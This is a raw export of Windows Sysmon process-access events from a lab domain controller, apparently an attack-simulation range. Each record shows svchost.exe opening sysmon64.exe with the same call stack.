10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
